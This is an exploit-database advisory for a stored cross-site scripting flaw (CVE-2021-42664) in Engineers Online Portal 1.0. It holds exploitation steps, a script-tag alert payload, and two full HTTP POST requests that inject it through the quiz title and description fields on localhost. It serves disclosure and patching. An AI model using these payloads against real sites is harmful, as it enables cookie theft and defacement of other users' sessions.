Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)

🗓️ 25 Oct 2021 00:00:00Reported by Alon LevievType

exploitdb🔗 www.exploit-db.com👁 489 Views

Engineers Online Portal 1.0 Cross-Site Scripting Vulnerability

Reporter	Title	Published	Views	Family All 14
0day.today	Engineers Online Portal 1.0 - (multiple) Stored Cross-Site Scripting Vulnerability	25 Oct 202100:00	–	zdt
Circl	CVE-2021-42664	5 Nov 202115:27	–	circl
CNNVD	Engineers Online Portal 跨站脚本漏洞	5 Nov 202100:00	–	cnnvd
CNVD	Sourcecodester Engineers Online Portal Cross-Site Scripting Vulnerability	8 Nov 202100:00	–	cnvd
CVE	CVE-2021-42664	5 Nov 202112:19	–	cve
Cvelist	CVE-2021-42664	5 Nov 202112:19	–	cvelist
GithubExploit	Exploit for Cross-site Scripting in Engineers_Online_Portal_Project Engineers_Online_Portal	3 Nov 202119:29	–	githubexploit
GithubExploit	Exploit for Cross-site Scripting in Engineers_Online_Portal_Project Engineers_Online_Portal	3 Nov 202119:29	–	githubexploit
EUVD	EUVD-2021-29625	3 Oct 202520:07	–	euvd
NVD	CVE-2021-42664	5 Nov 202113:15	–	nvd

# Exploit Title: Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/nia_munoz_monitoring_system.zip
# Version: 1.0
# Tested on: Kali Linux 
# CVE : cve-2021-42664
# Vulnerable page: add_quiz.php
# Vulnerable Parameters: "quiz_title", "description"

Technical description:
A stored XSS vulnerability exists in the Engineers Online Portal. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. 

Steps to exploit:
1) Navigate to http://localhost/nia_munoz_monitoring_system/add_quiz.php
2) Insert your payload in the "quiz_title" parameter or the "description" parameter
3) Click save

Proof of concept (Poc):
The following payload will allow you to run the javascript - 
<script>alert("This is an XSS Give me your cookies")</script>

---

POST /nia_munoz_monitoring_system/add_quiz.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/add_quiz.php
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1

quiz_title=%3Cscript%3Ealert%28%22This+is+an+XSS%22%29%3C%2Fscript%3E&description=xss&save=

OR

POST /nia_munoz_monitoring_system/edit_quiz.php?id=6 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
Connection: close
Referer: http://localhost/nia_munoz_monitoring_system/edit_quiz.php?id=6
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1

quiz_id=6&quiz_title=xss&description=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E&save=

---

25 Oct 2021 00:00Current

5.5Medium risk

Vulners AI Score5.5

CVSS 23.5

CVSS 3.15.4

EPSS0.01891

Engineers Online Portal 1.0 - &#039;multiple&#039; Stored Cross-Site Scripting (XSS)

Engineers Online Portal 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)